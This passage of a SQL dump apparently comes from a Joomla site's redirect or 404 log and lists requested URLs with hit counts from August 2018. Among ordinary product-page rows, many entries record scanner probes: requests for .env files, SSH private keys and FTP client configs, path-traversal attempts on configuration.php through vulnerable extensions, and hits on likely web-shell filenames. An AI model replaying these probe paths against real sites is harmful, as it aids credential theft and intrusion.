00:00:00',301),(20626,'http://3s-technologies.com.tr/wp-tmp.php',NULL,'','',5,0,'2018-08-02 20:59:49','0000-00-00 00:00:00',301),(20627,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/results,1-30',NULL,'','',2,0,'2018-08-02 21:37:23','0000-00-00 00:00:00',301),(20628,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-30',NULL,'','',1,0,'2018-08-02 21:55:43','0000-00-00 00:00:00',301),(20629,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-30',NULL,'','',1,0,'2018-08-02 21:59:23','0000-00-00 00:00:00',301),(20630,'http://3s-technologies.com.tr/tr/images/spyx.gif',NULL,'','',4,0,'2018-08-03 00:25:55','0000-00-00 00:00:00',301),(20631,'http://3s-technologies.com.tr/tr/media/cloud.php',NULL,'','',4,0,'2018-08-03 00:25:57','0000-00-00 00:00:00',301),(20632,'http://3s-technologies.com.tr/tr/media/spy.txt',NULL,'','',4,0,'2018-08-03 00:25:58','0000-00-00 00:00:00',301),(20633,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',4,0,'2018-08-03 00:25:58','0000-00-00 00:00:00',301),(20634,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc/results,1-100',NULL,'','',1,0,'2018-08-03 01:12:25','0000-00-00 00:00:00',301),(20635,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-100',NULL,'','',1,0,'2018-08-03 01:12:32','0000-00-00 00:00:00',301),(20636,'http://3s-technologies.com.tr/tr/deployment-config.json',NULL,'','',12,0,'2018-08-03 01:38:11','0000-00-00 00:00:00',301),(20637,'http://3s-technologies.com.tr/tr/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',2,0,'2018-08-03 05:34:33','0000-00-00 00:00:00',301),(20638,'http://3s-technologies.com.tr/en/?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://3s-technologies.com.tr/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',6,0,'2018-08-03 08:13:58','0000-00-00 00:00:00',301),(20639,'http://3s-technologies.com.tr/tr/.env',NULL,'','',389,0,'2018-08-03 17:42:16','0000-00-00 00:00:00',301),(20640,'http://3s-technologies.com.tr/tr/sftp-config.json',NULL,'','',135,0,'2018-08-03 17:42:17','0000-00-00 00:00:00',301),(20641,'http://3s-technologies.com.tr/tr/.ftpconfig',NULL,'','',23,0,'2018-08-03 17:42:17','0000-00-00 00:00:00',301),(20642,'http://3s-technologies.com.tr/tr/.remote-sync.json',NULL,'','',6,0,'2018-08-03 17:42:18','0000-00-00 00:00:00',301),(20643,'http://3s-technologies.com.tr/tr/.vscode/ftp-sync.json',NULL,'','',13,0,'2018-08-03 17:42:18','0000-00-00 00:00:00',301),(20644,'http://3s-technologies.com.tr/tr/.vscode/sftp.json',NULL,'','',141,0,'2018-08-03 17:42:19','0000-00-00 00:00:00',301),(20645,'http://3s-technologies.com.tr/tr/ftpsync.settings',NULL,'','',7,0,'2018-08-03 17:42:22','0000-00-00 00:00:00',301),(20646,'http://3s-technologies.com.tr/tr/ws_ftp.ini',NULL,'','',3,0,'2018-08-03 17:42:22','0000-00-00 00:00:00',301),(20647,'http://3s-technologies.com.tr/tr/filezilla.xml',NULL,'','',3,0,'2018-08-03 17:42:30','0000-00-00 00:00:00',301),(20648,'http://3s-technologies.com.tr/tr/sitemanager.xml',NULL,'','',1,0,'2018-08-03 17:42:30','0000-00-00 00:00:00',301),(20649,'http://3s-technologies.com.tr/tr/winscp.ini',NULL,'','',2,0,'2018-08-03 17:42:32','0000-00-00 00:00:00',301),(20650,'http://3s-technologies.com.tr/tr/id_rsa',NULL,'','',1,0,'2018-08-03 17:42:32','0000-00-00 00:00:00',301),(20651,'http://3s-technologies.com.tr/tr/id_dsa',NULL,'','',1,0,'2018-08-03 17:42:35','0000-00-00 00:00:00',301),(20652,'http://3s-technologies.com.tr/tr/.ssh/id_rsa',NULL,'','',1,0,'2018-08-03 17:42:35','0000-00-00 00:00:00',301),(20653,'http://3s-technologies.com.tr/tr/.ssh/id_dsa',NULL,'','',1,0,'2018-08-03 17:42:36','0000-00-00 00:00:00',301),(20654,'http://3s-technologies.com.tr/tr/.ssh/id_ecdsa',NULL,'','',1,0,'2018-08-03 17:42:36','0000-00-00 00:00:00',301),(20655,'http://3s-technologies.com.tr/tr/.ssh/id_ed25519',NULL,'','',1,0,'2018-08-03 17:42:37','0000-00-00 00:00:00',301),(20656,'http://3s-technologies.com.tr/tr/.idea/webservers.xml',NULL,'','',1,0,'2018-08-03 17:42:37','0000-00-00 00:00:00',301),(20657,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/dirdesc',NULL,'','',1,0,'2018-08-03 19:26:17','0000-00-00 00:00:00',301),(20658,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/results,1-10',NULL,'','',2,0,'2018-08-03 19:44:42','0000-00-00 00:00:00',301),(20659,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/results,1-50',NULL,'','',2,0,'2018-08-03 20:17:38','0000-00-00 00:00:00',301),(20660,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-20',NULL,'','',6,0,'2018-08-03 21:38:44','0000-00-00 00:00:00',301),(20661,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku',NULL,'','',3,0,'2018-08-03 23:42:59','0000-00-00 00:00:00',301),(20662,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc/results,1-40',NULL,'','',2,0,'2018-08-04 00:34:19','0000-00-00 00:00:00',301),(20663,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-10',NULL,'','',2,0,'2018-08-04 01:07:19','0000-00-00 00:00:00',301),(20664,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-40',NULL,'','',1,0,'2018-08-04 01:10:59','0000-00-00 00:00:00',301),(20665,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name/results,1-5',NULL,'','',1,0,'2018-08-04 11:00:31','0000-00-00 00:00:00',301),(20666,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-04 11:00:43','0000-00-00 00:00:00',301),(20667,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name/results,1-10',NULL,'','',6,0,'2018-08-04 16:45:56','0000-00-00 00:00:00',301),(20668,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name/results,1-5',NULL,'','',4,0,'2018-08-04 16:46:19','0000-00-00 00:00:00',301),(20669,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name/results,1-50',NULL,'','',5,0,'2018-08-04 16:46:58','0000-00-00 00:00:00',301),(20670,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/en/parks-home',NULL,'','',2,0,'2018-08-04 17:27:01','0000-00-00 00:00:00',301),(20671,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/en/welcome',NULL,'','',2,0,'2018-08-04 17:27:19','0000-00-00 00:00:00',301),(20672,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-05 01:30:22','0000-00-00 00:00:00',301),(20673,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name/dirdesc',NULL,'','',4,0,'2018-08-05 01:30:37','0000-00-00 00:00:00',301),(20674,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name/results,1-5',NULL,'','',2,0,'2018-08-05 01:31:01','0000-00-00 00:00:00',301),(20675,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-05 01:32:17','0000-00-00 00:00:00',301),(20676,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-05 10:00:34','0000-00-00 00:00:00',301),(20677,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/results,1-5',NULL,'','',2,0,'2018-08-05 10:56:12','0000-00-00 00:00:00',301),(20678,'http://3s-technologies.com.tr/tr/components/com_foxcontact/js/fileuploader.js',NULL,'','',2,0,'2018-08-06 02:15:03','0000-00-00 00:00:00',301),(20679,'http://3s-technologies.com.tr/tr/xsam_xadoo.htm',NULL,'','',6,0,'2018-08-06 04:02:39','0000-00-00 00:00:00',301),(20680,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-10',NULL,'','',2,0,'2018-08-06 05:36:20','0000-00-00 00:00:00',301),(20681,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-06 05:36:56','0000-00-00 00:00:00',301),(20682,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-10',NULL,'','',4,0,'2018-08-06 05:37:10','0000-00-00 00:00:00',301),(20683,'http://3s-technologies.com.tr/tr/phpmyadmin/index.php',NULL,'https://google.com','',9,0,'2018-08-06 08:55:20','0000-00-00 00:00:00',301),(20684,'http://3s-technologies.com.tr/tr/pma/index.php',NULL,'https://google.com','',6,0,'2018-08-06 08:55:21','0000-00-00 00:00:00',301),(20685,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name/results,1-5',NULL,'','',1,0,'2018-08-06 14:59:46','0000-00-00 00:00:00',301),(20686,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/dirdesc/results,1-5',NULL,'','',2,0,'2018-08-06 15:40:13','0000-00-00 00:00:00',301),(20687,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name/results,1-5',NULL,'','',2,0,'2018-08-06 15:40:53','0000-00-00 00:00:00',301),(20688,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_sku/results,1-5',NULL,'','',1,0,'2018-08-06 15:41:23','0000-00-00 00:00:00',301),(20689,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/results,1-50',NULL,'','',7,0,'2018-08-07 02:00:07','0000-00-00 00:00:00',301),(20690,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku/results,1-50',NULL,'','',4,0,'2018-08-07 02:01:47','0000-00-00 00:00:00',301),(20691,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/github.com/joomla',NULL,'','',4,0,'2018-08-07 03:56:32','0000-00-00 00:00:00',301),(20692,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-07 03:57:25','0000-00-00 00:00:00',301),(20693,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-07 03:57:30','0000-00-00 00:00:00',301),(20694,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/tr/parks-home',NULL,'','',2,0,'2018-08-07 04:00:41','0000-00-00 00:00:00',301),(20695,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/tr/welcome',NULL,'','',2,0,'2018-08-07 04:01:41','0000-00-00 00:00:00',301),(20696,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/parks-home',NULL,'','',7,0,'2018-08-07 04:13:42','0000-00-00 00:00:00',301),(20697,'http://3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'http://3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/elements/upload_file.php','',16,0,'2018-08-07 04:16:25','0000-00-00 00:00:00',301),(20698,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name/results,1-50',NULL,'','',1,0,'2018-08-07 04:23:43','0000-00-00 00:00:00',301),(20699,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-15',NULL,'','',1,0,'2018-08-07 05:52:33','0000-00-00 00:00:00',301),(20700,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-15',NULL,'','',1,0,'2018-08-07 05:54:04','0000-00-00 00:00:00',301),(20701,'http://3s-technologies.com.tr/en/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'http://3s-technologies.com.tr/modules/mod_ppc_simple_spotlight/elements/upload_file.php','',10,0,'2018-08-07 07:01:30','0000-00-00 00:00:00',301),(20702,'http://3s-technologies.com.tr/xmlrpc-activate.php',NULL,'','',4,0,'2018-08-07 11:03:10','0000-00-00 00:00:00',301),(20703,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/results,1-20',NULL,'','',1,0,'2018-08-07 11:11:46','0000-00-00 00:00:00',301),(20704,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/results,1-10',NULL,'','',2,0,'2018-08-07 11:12:02','0000-00-00 00:00:00',301),(20705,'http://3s-technologies.com.tr/tr/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',16,0,'2018-08-07 11:46:49','0000-00-00 00:00:00',301),(20706,'http://3s-technologies.com.tr//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',15,0,'2018-08-07 11:46:50','0000-00-00 00:00:00',301),(20707,'http://3s-technologies.com.tr/tr/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',16,0,'2018-08-07 11:46:54','0000-00-00 00:00:00',301),(20708,'http://3s-technologies.com.tr/tr/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',16,0,'2018-08-07 11:46:58','0000-00-00 00:00:00',301),(20709,'http://3s-technologies.com.tr/tr/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',50,0,'2018-08-07 11:47:03','0000-00-00 00:00:00',301),(20710,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-150',NULL,'','',2,0,'2018-08-07 12:09:31','0000-00-00 00:00:00',301),(20711,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/results,1-150',NULL,'','',2,0,'2018-08-07 12:10:05','0000-00-00 00:00:00',301),(20712,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-150',NULL,'','',2,0,'2018-08-07 12:10:41','0000-00-00 00:00:00',301),(20713,'http://3s-technologies.com.tr/tr/forum/huvudforum',NULL,'http://3s-technologies.com.tr/tr/forum/huvudforum','',1,0,'2018-08-07 14:03:11','0000-00-00 00:00:00',301),(20714,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/results,1-5',NULL,'','',4,0,'2018-08-07 14:53:29','0000-00-00 00:00:00',301),(20715,'http://3s-technologies.com.tr/tr/prv8.php',NULL,'','',44,0,'2018-08-07 16:35:32','0000-00-00 00:00:00',301),(20716,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-100',NULL,'','',2,0,'2018-08-07 17:55:35','0000-00-00 00:00:00',301),(20717,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-100',NULL,'','',1,0,'2018-08-07 17:55:53','0000-00-00 00:00:00',301),(20718,'http://3s-technologies.com.tr/includes.php',NULL,'','',4,0,'2018-08-07 22:18:40','0000-00-00 00:00:00',301),(20719,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-08-07 23:43:57','0000-00-00 00:00:00',301),(20720,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2018-08-07 23:47:37','0000-00-00 00:00:00',301),(20721,'http://3s-technologies.com.tr/update.php',NULL,'','',4,0,'2018-08-08 02:03:23','0000-00-00 00:00:00',301),(20722,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-50',NULL,'','',2,0,'2018-08-08 02:43:47','0000-00-00 00:00:00',301),(20723,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-10',NULL,'','',2,0,'2018-08-08 02:45:24','0000-00-00 00:00:00',301),(20724,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-5',NULL,'','',2,0,'2018-08-08 02:47:03','0000-00-00 00:00:00',301),(20725,'http://3s-technologies.com.tr/tr/wp-profi1e.php?x=1',NULL,'','',3,0,'2018-08-08 06:03:54','0000-00-00 00:00:00',301),(20726,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/welcome.html',NULL,'','',17,0,'2018-08-08 10:08:34','0000-00-00 00:00:00',301),(20727,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/results,1-10',NULL,'','',6,0,'2018-08-08 10:24:30','0000-00-00 00:00:00',301),(20728,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_name/results,1-5',NULL,'','',1,0,'2018-08-08 10:28:09','0000-00-00 00:00:00',301),(20729,'http://3s-technologies.com.tr/code.php.php',NULL,'','',3,0,'2018-08-08 11:33:47','0000-00-00 00:00:00',301),(20730,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,1-20',NULL,'','',3,0,'2018-08-08 11:45:12','0000-00-00 00:00:00',301),(20731,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_sku/results,1-10',NULL,'','',2,0,'2018-08-08 12:14:30','0000-00-00 00:00:00',301),(20732,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku/results,1-10',NULL,'','',7,0,'2018-08-08 12:18:10','0000-00-00 00:00:00',301),(20733,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',1,0,'2018-08-08 12:58:30','0000-00-00 00:00:00',301),(20734,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-100?error=404',NULL,'','',1,0,'2018-08-08 19:41:53','0000-00-00 00:00:00',301),(20735,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-10?error=404',NULL,'','',1,0,'2018-08-08 20:29:34','0000-00-00 00:00:00',301),(20736,'http://www.3s-technologies.com.tr/en/products/screen-printer/results,1-10',NULL,'','',3,0,'2018-08-09 03:23:58','0000-00-00 00:00:00',301),(20737,'http://www.3s-technologies.com.tr/en/products/screen-printer/results,1-5',NULL,'','',10,0,'2018-08-09 04:04:15','0000-00-00 00:00:00',301),(20738,'http://3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/img/hat.php.gif?hat=1',NULL,'http://3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/img/hat.pHp.gif?hat=1','',5,0,'2018-08-09 09:41:15','0000-00-00 00:00:00',301),(20739,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/magrabi.php',NULL,'3s-technologies.com.tr','',1,0,'2018-08-09 11:23:08','0000-00-00 00:00:00',301),(20740,'http://3s-technologies.com.tr/en/modules/mod_ppc_simple_spotlight/img/hat.php.gif?hat=1',NULL,'http://3s-technologies.com.tr/modules/mod_ppc_simple_spotlight/img/hat.pHp.gif?hat=1','',4,0,'2018-08-09 13:41:06','0000-00-00 00:00:00',301),(20741,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/components/com_virtuemart/assets/css/chosen.css?vmver=ff2d09ba','',24,0,'2018-08-09 21:14:35','0000-00-00 00:00:00',301),(20742,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-40',NULL,'','',1,0,'2018-08-10 06:01:13','0000-00-00 00:00:00',301),(20743,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2018-08-10 06:04:48','0000-00-00 00:00:00',301),(20744,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-60',NULL,'','',1,0,'2018-08-10 14:48:42','0000-00-00 00:00:00',301),(20745,'http://www.3s-technologies.com.tr/tr/megatek-elektronik.com.tr/joomla/index.php',NULL,'http://www.3s-technologies.com.tr/tr/megatek-elektronik.com.tr/joomla/index.php','',1,0,'2018-08-10 18:23:13','0000-00-00 00:00:00',301),(20746,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-10 22:16:05','0000-00-00 00:00:00',301),(20747,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-11 07:25:41','0000-00-00 00:00:00',301),(20748,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-50',NULL,'','',4,0,'2018-08-11 07:25:44','0000-00-00 00:00:00',301),(20749,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-11 07:25:48','0000-00-00 00:00:00',301),(20750,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-11 07:26:02','0000-00-00 00:00:00',301),(20751,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2018-08-11 08:33:11','0000-00-00 00:00:00',301),(20752,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-08-11 08:34:17','0000-00-00 00:00:00',301),(20753,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-08-11 08:35:26','0000-00-00 00:00:00',301),(20754,'http://3s-technologies.com.tr/shell.php',NULL,'','',5,0,'2018-08-11 19:07:50','0000-00-00 00:00:00',301),(20755,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2018-08-11 19:29:36','0000-00-00 00:00:00',301),(20756,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/dirdesc/results,6-55?language=en-gb',NULL,'','',1,0,'2018-08-11 20:34:15','0000-00-00 00:00:00',301),(20757,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,6-25?language=en-gb',NULL,'','',1,0,'2018-08-11 20:45:15','0000-00-00 00:00:00',301),(20758,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,6-55?language=en-gb',NULL,'','',1,0,'2018-08-11 20:59:55','0000-00-00 00:00:00',301),(20759,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/results,6-55?language=en-gb',NULL,'','',1,0,'2018-08-11 21:03:35','0000-00-00 00:00:00',301),(20760,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,6-55?language=en-gb',NULL,'','',4,0,'2018-08-11 21:25:34','0000-00-00 00:00:00',301),(20761,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,6-55?language=en-gb',NULL,'','',9,0,'2018-08-11 22:05:54','0000-00-00 00:00:00',301),(20762,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,6-10?language=en-gb',NULL,'','',2,0,'2018-08-11 23:08:14','0000-00-00 00:00:00',301),(20763,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,6-15?language=en-gb',NULL,'','',1,0,'2018-08-12 00:21:34','0000-00-00 00:00:00',301),(20764,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-12 06:59:35','0000-00-00 00:00:00',301),(20765,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-12 10:27:24','0000-00-00 00:00:00',301),(20766,'http://3s-technologies.com.tr/log.php',NULL,'','',7,0,'2018-08-12 12:03:40','0000-00-00 00:00:00',301),(20767,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-12 14:26:37','0000-00-00 00:00:00',301),(20768,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name/results,1-50',NULL,'','',1,0,'2018-08-12 14:30:13','0000-00-00 00:00:00',301),(20769,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name',NULL,'','',17,0,'2018-08-12 19:38:44','0000-00-00 00:00:00',301),(20770,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering',NULL,'','',9,0,'2018-08-12 19:40:34','0000-00-00 00:00:00',301),(20771,'http://3s-technologies.com.tr/tr/bak.php?login=canshu?',NULL,'','',4,0,'2018-08-12 20:58:48','0000-00-00 00:00:00',301),(20772,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name/results,1-50',NULL,'','',1,0,'2018-08-12 21:12:19','0000-00-00 00:00:00',301),(20773,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,1-5',NULL,'','',10,0,'2018-08-12 21:14:09','0000-00-00 00:00:00',301),(20774,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,`p`.product_sku/dirdesc',NULL,'','',7,0,'2018-08-13 01:09:45','0000-00-00 00:00:00',301),(20775,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku/results,1-5',NULL,'','',6,0,'2018-08-13 01:10:52','0000-00-00 00:00:00',301),(20776,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/results,1-20',NULL,'','',1,0,'2018-08-13 01:45:58','0000-00-00 00:00:00',301),(20777,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-13 02:13:59','0000-00-00 00:00:00',301),(20778,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name/results,1-5',NULL,'','',1,0,'2018-08-13 02:15:47','0000-00-00 00:00:00',301),(20779,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-13 05:28:26','0000-00-00 00:00:00',301),(20780,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-50',NULL,'','',5,0,'2018-08-13 05:29:01','0000-00-00 00:00:00',301),(20781,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-08-13 05:29:38','0000-00-00 00:00:00',301),(20782,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-13 05:30:16','0000-00-00 00:00:00',301),(20783,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-08-13 05:30:59','0000-00-00 00:00:00',301),(20784,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-13 07:29:37','0000-00-00 00:00:00',301),(20785,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,ordering/results,1-10',NULL,'','',2,0,'2018-08-13 07:38:47','0000-00-00 00:00:00',301),(20786,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/results,1-20',NULL,'','',2,0,'2018-08-13 07:39:19','0000-00-00 00:00:00',301),(20787,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/dirdesc/results,1-10',NULL,'','',2,0,'2018-08-13 07:40:20','0000-00-00 00:00:00',301),(20788,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-40',NULL,'','',1,0,'2018-08-13 11:12:48','0000-00-00 00:00:00',301),(20789,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,6-10',NULL,'','',3,0,'2018-08-13 11:58:01','0000-00-00 